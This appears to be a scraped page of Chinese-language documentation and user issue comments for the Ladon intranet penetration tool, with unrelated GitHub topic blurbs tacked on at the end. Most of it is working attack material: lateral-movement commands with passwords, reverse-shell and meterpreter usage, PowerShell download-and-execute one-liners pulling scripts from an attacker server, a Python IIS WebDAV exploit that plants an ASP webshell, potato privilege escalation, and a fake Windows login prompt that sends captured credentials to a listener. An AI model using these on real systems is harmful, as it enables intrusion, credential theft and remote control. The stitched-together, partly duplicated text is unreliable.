Ladon大型内网渗透工具,可PowerShell模块化、可CS插件化、可内存加载,无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。Ladon 12.2内置262个功能,网络资产探测模块32个通过多种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息,高危漏洞检测16个含MS17010、Zimbra、Exchange
Home Page: http://k8gege.org/Ladon/
License: MIT License
http://k8gege.org/Ladon/WinShell.html
在内网渗透中,横向移动用的最多的就是远程执行命令了,网上有很多相关工具,系统也自带相关命令。但不是体积大就是命令繁琐,如schtasks命令等,执行需先创建任务、执行任务、删除任务等,命令长,输错会浪费很多时间,即使复制粘贴也很麻烦。体积大的如Impacket中的psexec/atexec/smbexec/wmiexec等,若是使用PY2.7编译低版本最小也5M左右,最大可能37.5M,无论是内存加载或是传到目标都很麻烦,如果后渗透工具垃圾,区区这几M还未必能传上去,传上去得浪费很多时间。传一个就5M,传4个不得20M?基于以上原因,Ladon添加常用的远程执行命令功能,6.5体积仅844K就包含以上工具功能,扫描到相关密码,即可使用对应模块横向移动,一站式工具,完美一条龙服务。
需先连接IPC,然后再通过psexec执行命令,类似psexec需445端口
net user \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system并非所有机器都允许连接445端口,所以可通过135端口执行命令
Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami通过sctask命令执行,可以SYSTEM权限或对应用户执行命令,需445端口
但是以用户权限执行命令需要远程机器登陆对应用户
Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami一般开放SSH服务的有Linux系统,网络设备等,默认为22端口
Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami支持菜刀以及Ladon自动GetShell时传的UAshell,详见:http://k8gege.org/p/ladon_cs_shell.html
Usage:Ladon JspShell type url pwd cmd
Example: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami支持7种脚本(jsp asp php aspx cfm py perl),3种类型WebShell(cd ua k8)
支持菜刀以及Ladon自动GetShell时传的UAshell,详见:http://k8gege.org/p/ladon_cs_shell.html
Usage:Ladon WebShell ScriptType ShellType url pwd cmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
〖提权〗Ladon 8.0五种白名单方法BypaaUAC
http://k8gege.org/p/Ladon_bypassUAC.html
建议加上可选的扫描记录的一个输出
ladon里有哪个参数是可以更换内置端口进行漏洞利用的啊
未经处理的异常: OutOfMemoryException
ip.txt中1w个ip地址,格式如下
118.118.118.112
118.118.118.112
118.118.118.112
118.118.118.112
RT
未将对象引用设置到对象的实例
请问这个报错对扫描结果有影响吗?是指什么?
from mysmb import MYSMB?
大佬,解压密码是多少?。。。
ladon40.exe noping 172.16.1.134 smbscan 会把整个ip段都扫一遍 就有点迷了
就因为加了个 noping 选项 ,不加就是正常的只扫一个单独ip
能开放wmi弱密码的源码吗?
环境: Windows 2008 R2 x64
Ladon40 可以使用,Ladon .net 2.x 调用SmbScan扫描时报错
System.IO.FileNotFoundException: 未能加载文件或程序集“System.Core, Version=3.5.
0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089”或它的某一个依赖项。系统
找不到指定的文件。
文件名:“System.Core, Version=3.5.0.0, Culture=neutral, PublicKeyToken=b77a5c561
934e089”
在 SharpCifs.Util.Sharpen.Extensions.Contains[T](ICollection`1 col, Object it
em)
在 SharpCifs.Util.Sharpen.Runtime.GetProperty(String key)
在 SharpCifs.Config..cctor()
警告: 程序集绑定日志记录被关闭。
要启用程序集绑定失败日志记录,请将注册表值 [HKLM\Software\Microsoft\Fusion!Enabl
eLog] (DWORD)设置为 1。
注意: 会有一些与程序集绑定失败日志记录关联的性能损失。
要关闭此功能,请移除注册表值 [HKLM\Software\Microsoft\Fusion!EnableLog]。
http://k8gege.org/Ladon/WebShell.html
在内网渗透中,横向移动用的最多的就是远程执行命令了,网上有很多相关工具,系统也自带相关命令。但不是体积大就是命令繁琐,如schtasks命令等,执行需先创建任务、执行任务、删除任务等,命令长,输错会浪费很多时间,即使复制粘贴也很麻烦。体积大的如Impacket中的psexec/atexec/smbexec/wmiexec等,若是使用PY2.7编译低版本最小也5M左右,最大可能37.5M,无论是内存加载或是传到目标都很麻烦,如果后渗透工具垃圾,区区这几M还未必能传上去,传上去得浪费很多时间。传一个就5M,传4个不得20M?基于以上原因,Ladon添加常用的远程执行命令功能,6.5体积仅844K就包含以上工具功能,扫描到相关密码,即可使用对应模块横向移动,一站式工具,完美一条龙服务。
需先连接IPC,然后再通过psexec执行命令,类似psexec需445端口
net user \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system并非所有机器都允许连接445端口,所以可通过135端口执行命令
Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami通过sctask命令执行,可以SYSTEM权限或对应用户执行命令,需445端口
但是以用户权限执行命令需要远程机器登陆对应用户
Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami一般开放SSH服务的有Linux系统,网络设备等,默认为22端口
Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami支持菜刀以及Ladon自动GetShell时传的UAshell,详见:http://k8gege.org/p/ladon_cs_shell.html
Usage:Ladon JspShell type url pwd cmd
Example: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami支持7种脚本(jsp asp php aspx cfm py perl),3种类型WebShell(cd ua k8)
支持菜刀以及Ladon自动GetShell时传的UAshell,详见:http://k8gege.org/p/ladon_cs_shell.html
Usage:Ladon WebShell ScriptType ShellType url pwd cmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
〖教程〗Ladon IIS站点密码读取
http://k8gege.org/Ladon/iispwd.html
获取IIS站点、路径、帐号、密码
Ladon EnumIIS
Ladon IisPwd最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
请问dumplsass是怎么用的?需要导出lsass信息以后。
再使用mimikaz来看么?
〖教程〗Ladon迷你WEB服务器/一键内网HTTP服务器
http://k8gege.org/Ladon/webser.html
你是否在为配置浏览器漏洞测试环境而烦恼,如配置Apache解析某种MIME测试某个漏洞
又或者在为内网机器无WEB又无法通过其它协议传输文件到内网另一台不出网的主机烦恼
还有些远程命令不支持多条语句,需要多次写入或HTTP一次性下载过去,显然都会选后者
1.浏览器0day漏洞测试或VPS上一键部署,无需安装配置Apache
2.内网HTTP协议文件传输,如内网目标不出网不允许其它协议通过
3.Office/Word/Pdf等漏洞或远程下载SCT、HTA等格式的CS Payload
4.IP追踪,在邮件里放任意URL,当目标查阅邮件时,可记录访问IP
5.系统探测,无论用于XSS或IP追踪都会记录UA,确认目标操作系统
6.出网探测,内网命令行访问VPS-WEB,看到IP证明可通过HTTP出网
7.远控问题,内网可访问WEB,HTTP不上线,就不要甩锅网络或WAF
写个txt放CMD命令或结果,内网访问txt,若正常说明WAF根本不拦
PS:第7点做点修改就可以得到简单的HTTP马了类似CS,读取TXT获取CMD命令,然后执行。
为了安全起见,文件不存在返回404,默认不列目录
Ladon web 80
Ladon webser 80使用dir或dirlist参数,可返回WEB目录列表
Ladon web 80 dir
Ladon webser 80 dir使用TCP SOCKET实现的HTTP服务器,任意权限下都可以,不像HTTPlisten需管理员权限
很多人常说TCPListen和HTTPLinsen有什么区别,都可以实现一模一样的WEB服务器
但权限不一样,实现过程也不一样,就像不同快递,包装材料不一样,送达时间也不一样
直接使用HTTP不需要自己构造协议包,而使用TCP得自己构造HTTP包,这就是区别之一
在Ladon同目录下放你想下载的文件,浏览器访问即可,命令行下载也可以
Linux: Wget、curl等
Windows: 10几20多种,自行去网上搜索
最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
http://k8gege.org/Ladon/SubDomain.html
域名、IP,右键可访问域名
导出TXT、CSV结果
Example: Ladon baidu.com SubDomain
需域名字典SubDomain.dic,字典上万个高效率子域名
http://k8gege.org/p/c5430395.html
Ladon 6.2支持Cobalt Strike 4.0,内置58个功能
加载脚本Ladon.cna,通过Beacon命令或右键使用
CS命令行下扫描目标内网,无需代理转发扫描收集信息、密码爆破等
跳板扫描外网资产(即无需代理直接通过在控机器扫描其它目标资产)
相比Beacon命令行,GUI就更简单了,只需填写IP、URL等,一键扫描
主菜单
资产扫描
漏洞检测
密码爆破
网络嗅探
信息收集
例子:WmiHash密码爆破
Example: Ladon help
Example: Ladon 192.168.1.8/24 MS17010
结果:IP、SMB漏洞、机器名、操作系统版本
Example: Ladon 192.168.1.8/24 OSscan
通过SMB、多端口、Banner等方式探测(存活主机、主机名、域名、操作系统版本、开放服务等)
Example: Ladon 192.168.1.8/24 OnlinePC
也支持检测主机名/域名是否存活,结果IP、Mac、机器名
Example: Ladon 192.168.1.8/24 WebScan
内网站点扫描,获取服务器Banner、网页标题
Example: Ladon 192.168.1.8/24 FtpScan
需上传user.txt和pass.txt至beacon工作目录
Example: Ladon 192.168.1.8/24 WmiScan
Wmi方式批量爆破内网主机帐密,需上传user.txt和pass.txt至工作目录
Example: Ladon 192.168.1.8/24 CiscoScan
(IP、设备型号、主机名、Boot、硬件版本)
Example: Ladon 192.168.1.8/24 UrlScan
通过源码获取域名或URL,但不验证IP,适用于内网扫描时,目标域名指向外网IP
或者通过域名判断内网站点是何产品,比如出现cisco.com域名,说明此为cisco设备
Example: Ladon 192.168.1.8/24 SameWeb
通过源码获取域名并验证IP,返回正确的同服站点,非bing或爱站等方式,即内网不可上网也可扫描
验证IP主要适用于,外网扫描时旁站,因为获取的域名指向外网时,无法通过IP判断是否属于同服
Example: Ladon 192.168.1.8/24 WeblogicPoc
Example: Ladon 192.168.1.8/24 WeblogicExp
Weblogic漏洞扫描两个模块,一个是只扫描是否存在漏洞,另一个是扫描并且GetShell
Example: Ladon 192.168.1.8/24 EnumMSSQL
和PowerUpSql一样不一定能获取到SQL版本
Example: Ladon 192.168.1.8/24 EnumShare
Example: Ladon 192.168.1.8/24 MssqlScan
Example: Ladon 192.168.1.8/24 MysqlScan
Example: Ladon 192.168.1.8/24 SSHscan
Example: Ladon 192.168.1.8/24 OracleScan
Example: Ladon 192.168.1.8/24 HostIP
Example: Ladon 192.168.1.8/24 WhatCMS
url.txt指定站点或批量站点扫描,也可扫描整个C段部分web端口对应CMS
Example: Ladon 192.168.1.8/24 IpcScan
Example: Ladon 明文字符串 EnBase64
Example: Ladon Base64内容 DeBase64
Example: Ladon 明文字符串 EnHex
Example: Ladon 16进制内容 EnHex
Example: Ladon 192.168.1.8/24 SmbScan
Example: Ladon 192.168.1.8/24 PhpStudyPoc
Example: Ladon youdomain DomainIP
Example: Ladon 192.168.1.8/24 SubDomain
需域名字典SubDomain.dic
例子: Ladon baidu.com SubDomain
Example: Ladon http://youweb.com WebDir
Example: Ladon 192.168.1.8/24 ActiveMQPoc
最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
搜到的包却无法安装成功
作者请问一下 linux 7.0版本什么时候也更新一下呢
如何导入目标IP的TXT? ladon.exe target.txt OsScan 例如这样
〖教程〗Ladon反弹Shell系列教程
http://k8gege.org/Ladon/ReverseShell.html
Usage:
Ladon ReverseTcp ip port type
type: meter shell nc监听nc shell可用工具非常多,如NC、LadonGui、PowerCat、MSF等
nc -l -v -p 4444
LadonGui--Netcat--Listen
powercat -l -p 4444Ladon ReverseTcp 192.168.1.8 4444 nc反弹NC shell
LadonGui监听
常用NC监听
Ladon ReverseTcp 192.168.1.8 4444 shell
Ladon ReverseTcp 192.168.1.8 4444 meter
Load PowerCat
Usage:
Reverse Tcp: Ladon PowerCat -r 192.168.1.110 4444 cmd
Reverse Tcp: Ladon PowerCat -r 192.168.1.110 4444 psh
Reverse Udp: Ladon PowerCat -r 192.168.1.110 4444 cmd -u
Reverse Udp: Ladon PowerCat -r 192.168.1.110 4444 psh -u反弹TCP,PowerCat监听执行PowerShell
Usage:
Ladon ReverseHttp ip port
Ladon ReverseHttps ip portMSF监听
windows/meterpreter/reverse_http
windows/meterpreter/reverse_https
Ladon ReverseTcp 192.168.1.8 4444 meter反弹HTTPS
MSF HTTPS
最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
what is the password please?
http://k8gege.org/Ladon/ntlminfo.html
[+] WmiInfo (135)
[+] SmbInfo (445)
[+] WinrmInfo (5985/80/8080/443)
[+] MssqlInfo (1433)
[+] ExchangeInfo (443)
[+] RdpInfo (3389)
[+] WmiExec2 支持文件上传、Base64cmd解决CS解析空格引号的问题
[+] Ping 重新启用系统Ping检测存活主机(目标PS1版本检测不到)six six six...
〖教程〗QuasarRat代码修改加载Ladon一键扫描内网
http://k8gege.org/p/quasar.html
CS4.2插件提示数据包太大“Woah! Task 1054819 for 846779210 is beyond our limit. Dropping it”,无法使用
ladon和ladon40两个exe程序打开后都会闪退,其他均正常
原文:http://k8gege.org/Ladon/iisput
LadonExp生成器使用教程之IIS写权限漏洞利用,含环境配置、EXP生成、批量利用、Pyhton复现代码。
该漏洞的产生原因来源于服务器配置不当造成,此漏洞主要是因为服务器开启了webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。
1 启用webdav组件
2 目录给写权限(为了方便直接eveyone完全写入权限)
3 脚本资源访问权限(不然MOVE失败即无法GetShell)
使用LadonEXP可轻松复现此类漏洞,在Ladon改名前(Cscan)已复现过Tomcat,详情参考Tomcat CVE-2017-12615视频: https://github.com/k8gege/K8CScan/tree/master/Video
功能:上传123.TXT
Target: http://192.168.1.22
Method: Put
addurl: 123.txt
Data: <%eval request(k8gege)%>
点击buildexe->TestExe测试
成功返回 Created
功能:将123.txt改名1.asp
Target: http://192.168.1.22/123.txt
Method: Move
Destination: http://192.168.1.22/1.asp
点击buildexe->TestExe测试
成功返回 Created
PS: 当然也可以直接PUT写入可解析的其它格式,也不一定非得先PUT再MOVE才能GetShell
扫描C段,当然也可以A段B段
Ladon 192.168.1.1/c 生成.dll
Ladon 192.168.1.1/24 生成.dllurl.txt里放批量地址,不在同一个段的,示例如下
http://192.168.1.1
http://192.10.5.8:808
Ladon 生成.dllPython实现利用代码
#encoding="utf-8"
import requests
put_url = 'http://192.168.1.22/2.txt'
move_url = 'http://192.168.1.22/2.txt'
move_headers = {
'Destination':'http://192.168.1.22/shell.asp'
}
put_data = "<%eval request('k8gege')%>"
post_data = {
'#':''
}
try:
response = requests.request('PUT',url=put_url,data=put_data)
if response.status_code == 200:
response = requests.request('MOVE',url=move_url,headers=move_headers)
if response.status_code == 207:
response = requests.post(url='http://192.168.1.22/shell.asp',data=post_data)
print(response.content.decode("gb2312"))
else:
print(response.status_code)
except:
pass
最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
IIS Exp: https://github.com/k8gege/iisput
原文: http://k8gege.org/Ladon/potato.html
Ladon提权之PipePotato/BadPotato/SweetPotato/PrintSpoofer
>= Ladon 7.2.0
Update: 20200810
通过各种方法在本地NTLM中继获取SYSTEM令牌,再通过模拟令牌执行命令,通过以上方法提权统称为potato(不管是否基于原potato修改)。就像SQL注入,通过特定SQL语句注入获取特定数据库信息统称为SQL注入,而不管如何编写的SQL语句,是否基于别人的SQL语句修改。
1 本地NTLM中继获取SYSTEM令牌
2 SeImpersonatePrivilege特权
测试中任意用户都可以通过本地NTLM中继获取到SYSTEM令牌权限,但是由于USER默认不开户SeImpersonatePrivilege特权,无法模拟令牌创建进程无法执行命令,所以会导致很多Potato提权失败。如下方”Win7管理员提权至SYSTEM“图片上部分就是USER部分的Potato提权失败,下方是管理员权限,而其它环境都是IIS权限。所以为了方便Ladon默认也显示当前用户SeImpersonatePrivilege特权情况。
SweetPotato集成了原版Potato和JulyPotato的功能,包含DCOM/WINRM/PrintSpoofer方法获取SYSTEM。
Load SweetPotato
Local Privilege Escalation from Windows Service Accounts to SYSTEM
Vulnerable: Win7-Win10/Win2008-2019
Usage:
Ladon SweetPotato cmdlinepipePotato:一种新型的通用提权漏洞,PrintSpoofer是一个利用打印机PIPE提权的方法,国人写了个工具叫BadPotato。
Load BadPotato
Local Privilege Escalation from Windows Service Accounts to SYSTEM
PrintSpoofer Abusing Impersonate Privileges.
Vulnerable: Win8-Win10/Win2012-2019
Usage:
Ladon BadPotato cmdline1 Win7 IIS 应用池用户权限
2 Win7 本地管理员用户权限
3 Win2012 IIS 应用池权限
4 Win7 本地服务用户权限
5 Win8 本地服务用户权限
PS:由于BadPotato不支持WIN7系统,所以以上环境主要以测试SweetPotato为主。
本地服务用户权限下直接以SYSTEM权限上控Cobalt Strike
http://k8gege.org/p/6b9b3afe.html
最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
Ladon7.0之后的版本暂时只能在"K8小密圈"下载,对于大部分人来说7.0及之前的版本是完全够用的。
就像Nbtscan一个仅具备Ladon存活主机探测其中一个模块OnlinePC的几分之一功能,还不准确,某种程度上来说已跟不上时代的工具,依旧有人觉得够用,即便是Ladon旧版甚至早期版本Cping都比它好用很多,所以对于一些人来说根本没必要下最新版。
1.修复已发现的BUG
2.改进完善已有功能
3.特征更新识别更准,如OSSCAN、WhatCMS等更多方法、更多特征识别目标操作系统或CMS。
4.新增一些常用功能,大部分功能都在相关独立工具,只是为了方便不想传大多文件,一个搞定。当然个别功能也比其它独立工具好,比如PSEXEC执行命令传输时是加密的,而网上的却只是明文传输,所以并非只是单纯的集成功能,也有修改和优化。
5.后期也会增加一些新的模块,毕竟还有很多协议相关功能未实现,或者新洞扫描。
Program.cs 中扫描的的地方都是二进制的,安全人员生产环境敢用吗?
用了后企业内网全打趴下咋办?
〖教程〗PowerShell远程内存加载(无文件渗透)
http://k8gege.org/Ladon/RemoteLadon.html
本文仅是PowerLadon远程加载例子,并不代表只有这些功能。详情参考完整文档
脚本可直接远程内存加载使用无须免杀,或者有些人比较喜欢的所谓无文件渗透
使用命令 Ladon web 800 架设一个WEB服务器,用于远程下载脚本
实战可架设在VPS,或者架设在目标内网机器(因为有机器不能出网)
将脚本放在WEB目录下即可,当然大家也可以用IIS或APACHE搭建WEB
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.8/24 MS17010"
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.141 OracleScan"
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.141 SmbScan"
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.141 WmiScan"
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.40 SmbHash"
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.40 WmiHash"
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon ReverseTcp 192.168.1.3 4444 nc"
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.110:800/Ladon6.6_all.ps1'); Ladon PowerCat 192.168.1.110 4444 cmd"
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon wmiexec 192.168.1.40 administrator k8gege520 whoami"
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon atexec 192.168.1.40 administrator k8gege520 whoami"
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon sshexec 192.168.1.40 root k8gege520 whoami"
C:\Users\null\Desktop\runnet>powershell "IEX (New-Object Net.WebClient).Download
String('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.40 smbhash"
Ladon 6.6
Start: 2020-07-03 17:12:31
Runtime: .net 2.0 OS Arch: x86
OS Name: Microsoft Windows 7 旗舰版
192.168.1.40
load SmbHashScan
ICMP: 192.168.1.40 00-0C-29-0E-1D-50 VMware
192.168.1.40 445 Open
SmbHashCheck 192.168.1.40 administrator BCB4DEE13F1BE64A85DE5769056E3008
Successfully authenticated to the target
Found 192.168.1.40 administrator BCB4DEE13F1BE64A85DE5769056E3008 ISOK
IP Finished!
End: 2020-07-03 17:12:35C:\Users\null\Desktop\runnet>powershell "IEX (New-Object Net.WebClient).Download
String('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon psexec 192.168.1.40"
Ladon 6.6
Start: 2020-07-03 15:35:55
Runtime: .net 2.0 OS Arch: x86
OS Name: Microsoft Windows 7 旗舰版
Load PsExec
[*] hostname: 192.168.1.40
[*] Choosing net35
[*] Copied net35 service executable to 192.168.1.40
[*] Installed net35 Service on 192.168.1.40
[*] Service Started on 192.168.1.40
psexec> whoami
nt authority\systemC:\Users\null\Desktop\runnet>powershell "IEX (New-Object Net.WebClient).Download
String('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon atexec 192.168.1.40 adm
inistrator k8gege520 whoami"
Ladon 6.6
Start: 2020-07-03 17:07:53
Runtime: .net 2.0 OS Arch: x86
OS Name: Microsoft Windows 7 旗舰版
Load AtExec
SmbExec by 0x7556
IPC Connected
=====================================================
nt authority\systemC:\Users\null\Desktop\runnet>powershell "IEX (New-Object Net.WebClient).Download
String('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon wmiexec 192.168.1.40 ad
ministrator k8gege520 whoami"
Ladon 6.6
Start: 2020-07-03 17:17:28
Runtime: .net 2.0 OS Arch: x86
OS Name: Microsoft Windows 7 旗舰版
Load WmiExec
[!] Connecting with administrator
[i] Connecting to 192.168.1.40
[i] Connected
[i] Command: whoami
[i] Running command...
[i] Getting stdout from registry from SOFTWARE\
[i] Full command output received
win-4udh62v7dmn\administrator最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
〖编程〗Ladon自定义POC插件模块编写
http://k8gege.org/p/Ladon_diypoc.html
http://k8gege.org/Ladon/GetWinAuth.html
>= Ladon 6.6.3
使用PowerShell模仿Windowns登陆认证获取管理员密码,Ladon监听捕获基础认证密码。
域控或管理员密码获取,当前权限很低又无法提权时。(有权限直接读明文或HASH)
该功能模仿了MSF里的基础认证监听模块,但最大的优势在于无需占用系统大量空间和内存。
可直接部署在目标内网或VPS上,也无需复杂命令,直接输以下命令一键监听自动捕获密码。
其它用途:http://k8gege.org/Ladon/webser.html
Ladon Web 800执行以下脚本代码,会弹出十分逼真的基础认证登陆窗口,自动获取用户名和域来提高真实性。
当然也可以使用其它脚本或语言,如JS水坑攻击、XSS截取各种WEB邮箱密码等等多种钩鱼姿势。
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
Add-Type @'
using System;
public class Authorization
{
public static void submit(string usr,string pwd)
{
string url = "http://192.168.1.110:8000/";
System.Net.HttpWebRequest myReq = (System.Net.HttpWebRequest)System.Net.WebRequest.Create(url);
string username = usr;
string password = pwd;
string usernamePassword = username + ":" + password;
System.Net.CredentialCache mycache = new System.Net.CredentialCache();
mycache.Add(new Uri(url), "Basic", new System.Net.NetworkCredential(username, password));
myReq.Credentials = mycache;
myReq.Headers.Add("Authorization", "Basic " + Convert.ToBase64String(new System.Text.ASCIIEncoding().GetBytes(usernamePassword)));
System.Net.WebResponse wr = myReq.GetResponse();
}}
'@
[Authorization]::submit($cred.username, $cred.getnetworkcredential().password)最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
还有Ladon下的依赖dll其实是在K8CScan库上,建议移到这个库里
how to config SshScan? check.txt?
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.